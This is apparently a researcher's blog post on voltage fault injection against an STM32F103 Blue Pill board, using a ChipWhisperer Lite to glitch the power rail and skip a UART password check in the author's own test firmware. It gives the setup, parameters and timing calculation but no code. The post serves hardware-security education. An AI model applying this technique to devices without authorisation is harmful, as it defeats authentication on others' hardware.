Introduction

With the rise in awareness of enhanced hardware-level security practices, it is high time that the rising security researchers got their hands dirty with some advanced hardware attacks. Thus, keeping this into consideration, I performed a small attack on the STM32 Blue Pill board. In this blog, I will discuss how I managed to skip the execution of the critical instruction on the STM32 microcontroller by injecting faults in the power rail of the circuit.

Sneeze jolts the heart, a Glitch jolts the hardware

It’s a common myth that the heart stops during a sneeze. Instead, the forceful pressure change in the chest during a sneeze can briefly alter your heart rate or rhythm, causing a momentary delay in a heartbeat, but your heart’s electrical system continues to function normally. 

Similarly, hardware needs power and a clock to function normally, and any fault or glitch in the voltage or the clock of the controller will cause the controller to behave abnormally. The faults in the hardware can occur naturally or can be attacker-induced. A well-engineered fault, when injected for a controlled amount of time, may result in a cause-specific effect that allows bypassing the security mechanism.

Voltage fault injection involves introducing a fault on the power rail of the circuit, causing the voltage to drop or go off for a short period, which leads to abnormal behaviour for a brief time. If the fault is injected during the execution of any critical instruction, this may lead to skipping the execution of the instruction and bypassing the security feature.

So, let’s start this experiment with a known development board where I will flash my own code and try to bypass some security checks. Before proceeding, let’s prepare our setup and understand the details of voltage fault injection.

Setting Up the Environment

Target Preparation

The target used in this blog post is the STM32 Blue Pill board with the STM32F103C8 controller. The following steps were taken to prepare the target for the glitching:

• Target code: The target code chosen for this experiment was a basic code where authentication is required on the serial communication via UART. The code was written and flashed using the STM32 Cube IDE. Refer Link for Programming guide: https://deepbluembedded.com/stm32-blue-pill-pinout-programming-guide/

• Identifying the Glitching Point: Referring to the “power supply scheme” in the controller’s datasheet, the point chosen for inserting the glitch was VDD, as it supplies power to the CPU through the regulator.

• Removing the Decoupling capacitor: While performing the glitch attack on the power rail of the circuit, it is expected to create a brief voltage drop/spike for a short time; however, there is always something that counteracts this momentary change. The decoupling capacitors across VDD are the ones that act against these by stabilising the voltage on a power supply line by suppressing high-frequency noise and providing a temporary voltage to the controller. Thus, these capacitors were removed before the voltage glitched.

Preparing the CW-Lite

The hardware chosen for inserting the glitch in the target board was ChipWhisperer Lite (CW-Lite). The following connections were made with the target:

• Glitch port: The “Glitch” port is the dedicated output for injecting a glitch in the target. The glitch port of the CW-Lite was wired in series to the VDD point of the target board. Also, this port was connected to the oscilloscope for monitoring the power.
• USART Interfacing: The UART pins of the target, i.e, pins A9 and A10, were connected to the pins TIO1 and TIO2 of the CW-Lite.
• Triggering the glitch: The glitching hardware always requires a trigger to understand that the target operation is going to start and when to insert the glitch. The TX pin, i.e., pin A9 of the Blue Pill board, was used as the input to the CW-Lite to trigger it. The A9 pin was connected to the TIO4.
• Reset: The RESET pin was connected to the ChipWhisperer TIO3

To control the ChipWhisperer for precise and controlled glitching and configure the glitching parameters, a Python script was written in Jupyter Notebook.

Glitching Parameters:

Inserting a glitch on the power rail of the circuit aims to shorten the power supply for a short amount of time. To make this happen, the glitch inserted should be precise enough so that the target doesn’t reset, and the desired effect of the glitch should be observed.

To control this, there are a few parameters that should be controlled to make the glitch well-engineered and hit the target instruction during its execution. The key parameters are

• Glitch Width: Defines how long the glitch pulse lasts; essentially controls the duration of the fault injected into the target. It controls the width of the glitch. Too wide a glitch may reset the target, and too small a glitch may not have any effect. On Chipwhisperer, width is expressed as a percentage of one period. The range of one glitch pulse can vary, possibly up to 49.8% of the period.
• Glitch offset: Determines when the glitch occurs relative to the trigger signal; adjusts the timing of the fault within the clock cycle. It controls the offset from a rising clock edge to the rising edge of a glitch pulse. A pulse may begin anywhere from -49.8% to 49.8% away from a rising edge, allowing glitches to be swept over the entire clock cycle.
• Repeat: Specifies how many glitch pulses are generated in a single trigger event, allowing multiple faults to be injected consecutively.
• Ext-offset: This is the critical parameter that tells the glitcher hardware when to insert the glitch after the trigger is received. The trigger can be a signal from the target itself or an external signal. Choosing the right ext_offset is crucial, as it helps to achieve the target operation.

Glitching the Target

Now that we have all the connections and setup ready, it’s time to glitch the target. As we are unsure about choosing the values for the glitching parameters, it’s better to take a range and sweep across the values within it. However, it is essential to note that the “ext_offset” is one of the critical parameters for determining the approximate waiting time after the trigger.

Determining the ext_offset

A logic analyser was utilised to capture UART communication and calculate the transmission time between the trigger, i.e, “Enter password” string and sending the wrong password again. It was calculated using the measurement feature in the logic analyser software.

The clock frequency of the CW-Lite was 100MHz.

Time period = 1/clock frequency i.e, Time period = 1/ 100MHz = 10ns

Time delay =799.8us = 799800ns

Approx waiting time = 799800/10 = 79980 clock cycles

Thus, after the trigger, the glitch should be injected somewhere after 79980 clock cycles.

Hence, approx. value of ext_offset should be near 79980.

Results

The glitch is aimed to skip the execution of the password check, which is supposed to bypass the authentication and send the string “Authentication Bypass” over serial. Several attempts were made to get the successful glitch.

Conclusion

I hope this blog post provides you with the nitty-gritty details of voltage glitching. Getting a successful glitch is unpredictable and not easy.  It requires multiple attempts with different wire lengths and glitching parameters. While performing this attack, I faced certain challenges, and I attempt to share my experience through this post to help others planning to get their hands dirty with such attacks.

To reduce risks and make glitching attacks harder in the future, certain strategies can be used. When designing a product, it’s essential to consider such attacks. Choosing the right chip is especially important, as many modern chips come with built-in protection against fault injection.